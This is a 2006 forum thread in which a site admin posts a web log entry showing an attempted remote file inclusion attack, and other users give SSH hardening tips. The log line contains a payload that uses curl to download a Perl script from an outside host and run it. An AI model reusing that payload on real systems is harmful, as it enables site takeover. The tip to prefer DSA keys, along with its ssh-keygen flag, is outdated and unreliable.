Gowator Posted June 8, 2006 Author Report Share Posted June 8, 2006 OK deny hosts is now active, can someone give me a go... it would help if you try mub or something as the username so I can see its you.... Quote Link to comment Share on other sites More sharing options...
Gowator Posted June 8, 2006 Author Report Share Posted June 8, 2006 200.45.94.130 - - [08/Jun/2006:20:20:58 -0400] "GET /glutenfree/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= http://www.freewebtown.com/carlito2711/www-data.dat?&cmd= cd%20/tmp/;curl%20-O%20http://www.freewebtown.com/carlito2711/prkl.txt; perl%20prkl.txt;rm%20-rf%20prkl.txt*? HTTP/1.0" 200 167 "-" "Mozilla/5.0" What does everyone make of this? [edited by tyme to fix URL issues] Quote Link to comment Share on other sites More sharing options...
tyme Posted June 8, 2006 Report Share Posted June 8, 2006 looks like an attempt to make use of a defacing tool (see here) Quote Link to comment Share on other sites More sharing options...
Gowator Posted June 9, 2006 Author Report Share Posted June 9, 2006 looks like an attempt to make use of a defacing tool (see here) Thanks tyme, Jeez, you'd think these people would have something else to do other than trying t take down a non-profit website helping people with a medical problem! However got a nice email from a company that had been cracked and was being used as a staging point so at least some good came of it. Quote Link to comment Share on other sites More sharing options...
tyme Posted June 10, 2006 Report Share Posted June 10, 2006 script kiddies are everywhere, and have way too much time on their hands. Quote Link to comment Share on other sites More sharing options...
arthur Posted June 10, 2006 Report Share Posted June 10, 2006 Gowator, why use a password at all? You can disable password logins in sshd, and just carry your RSA key in a USB stick, although you have to be careful with that as well. Also, security by obscurity works against the automated tools that script kiddies use. Recompile SSH to remove the version banner, and make it listen on a non-standard port, since script kiddies always check port 22. hth, Arthur Quote Link to comment Share on other sites More sharing options...
lavaeolus Posted June 20, 2006 Report Share Posted June 20, 2006 I would not use rsa-keys with ssh, better use dsa-keys > ssh-keygen -d will generate a 1024-bit dsa-key for bastille not anymore included in mandriva: it seems that at least some parts went into msec, if you have direct root-login disabled in msec then you will find a file in /etc called Bastille-no-login, this is one of the remnants of mechanisms that went from bastille into msec but yes it would be nice to have a complete bastille-suite delivered with mandriva, since originally bastille was mainly developed with red hat and mandrake in mind, hey Bastille is after all french btw I found some info on their site that they are working on updates for mandriva 2006 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.